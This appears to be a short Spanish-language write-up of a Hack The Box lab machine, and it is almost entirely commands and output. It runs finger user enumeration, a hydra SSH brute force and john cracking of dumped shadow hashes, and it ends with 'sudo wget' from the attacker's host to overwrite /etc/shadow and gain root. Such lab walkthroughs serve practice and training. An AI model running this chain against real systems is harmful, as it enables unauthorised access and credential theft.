Nmap scan report for 10.10.10.76                                 
Host is up (0.033s latency).                                     
Not shown: 56610 filtered ports, 8920 closed ports               
PORT      STATE SERVICE                                          
79/tcp    open  finger                                           
111/tcp   open  rpcbind                                          
22022/tcp open  SSH-2.0-Sun_SSH_1.3
41227/tcp open  unknown                                          
56745/tcp open  unknown

Ok, aquí se pone divertido no se que son esos puertos ja.

msf auxiliary(scanner/finger/finger_users) > run

finger [email protected]
Login Name TTY Idle When Where
sammy sammy pts/2 <Apr 24 12:57> 10.10.14.4 

ssh -p 22022 [email protected]

hydra -s 22022 -l sammy -P /root/Desktop/rockyou.txt 10.10.10.76 -t 4 ssh -V -F
sunny@sunday:/$ find -name 'backup*' -print
sunny@sunday:/$ cd ./backup/
sunny@sunday:/backup$ ls
agent22.backup shadow.backup
sunny@sunday:/backup$ cat shadow.backup 
mysql:NP:::::::
openldap:*LK*:::::::
webservd:*LK*:::::::
postgres:NP:::::::
svctag:*LK*:6445::::::
nobody:*LK*:6445::::::
noaccess:*LK*:6445::::::
nobody4:*LK*:6445::::::
sammy:$5$Ebkn8jlK$i6SSPa0.u7Gd.0oJOT4T421N2OvsfXqAT1vCoYUOigB:6445::::::
sunny:$5$iRMbpnBv$Zh7s6D7ColnogCdiVE5Flz9vCZOMkUFxklRhhaShxv3:17636::::::

https://www.aychedee.com/2012/03/14/etc_shadow-password-hash-formats/

 

root@kali:~# unshadow '/root/Desktop/passwd' '/root/Desktop/shadow' > mypasswd2
root@kali:~# john --wordlist='/root/Desktop/rockyou.txt' mypasswd 
root@kali:~# john --wordlist='/root/Desktop/rockyou.txt' mypasswd 
Warning: detected hash type "sha256crypt", but the string is also recognized as "crypt"
Use the "--format=crypt" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 2 password hashes with 2 different salts (sha256crypt, crypt(3) $5$ [SHA256 128/128 AVX 4x])
Remaining 1 password hash
Press 'q' or Ctrl-C to abort, almost any other key for status
0g 0:00:00:02 0.02% (ETA: 18:25:10) 0g/s 1648p/s 1648c/s 1648C/s cheska..oooooo
0g 0:00:00:18 0.16% (ETA: 19:03:45) 0g/s 1530p/s 1530c/s 1530C/s simina..chiquititas
cooldude!        (sammy)
1g 0:00:02:12 DONE (2018-06-22 16:03) 0.007567g/s 1542p/s 1542c/s 1542C/s coolpeople..chrystelle
Use the "--show" option to display all of the cracked passwords reliably
Session completed
root@kali:~# ssh -p 22022 [email protected]
Password: 
Last login: Tue Apr 24 12:57:03 2018 from 10.10.14.4
Sun Microsystems Inc.   SunOS 5.11      snv_111b        November 2008

sudo wget 10.10.14.6:8001/shadow -O /etc/shadow

su root

password de mi kali y ya.